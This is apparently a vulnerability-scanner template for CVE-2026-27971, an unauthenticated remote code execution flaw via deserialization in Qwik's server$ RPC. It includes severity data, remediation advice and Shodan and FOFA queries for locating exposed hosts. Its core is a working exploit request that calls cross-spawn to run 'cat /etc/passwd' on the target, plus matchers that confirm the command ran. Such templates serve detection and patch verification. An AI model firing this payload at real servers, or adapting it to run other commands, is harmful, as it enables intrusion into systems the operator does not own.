id: CVE-2026-27971

info:
  name: Qwik - Unauthenticated RCE via server$ Deserialization
  author: omarkurt
  severity: critical
  description: |
    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely. Exploitation requires require() to be available at runtime.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to version 1.19.1 or later.
  reference:
    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm
    - https://vulnerabletarget.com/VT-2026-27971
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-27971
    epss-score: 0.26168
    epss-percentile: 0.96391
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"q:version"
    fofa-query: body="q:version"
  tags: cve,cve2026,qwik,rce,deserialization,vkev

http:
  - raw:
      - |
        POST /?qfunc=sync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/qwik-json
        X-QRL: sync
        Origin: {{RootURL}}

        {"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
          - "contains(header, 'application/qwik-json')"
        condition: and
# digest: 4a0a00473045022100df693897fcfdcf53cb1c4905674db4df018427ed25a31ce7e7196ee7cf8e50fa02202039e5a44dbd434f7c84372b37bd77bdc2b8e3da52720dbe42d1ca2ca2480871:922c64590222798bb761d5b6d8e72950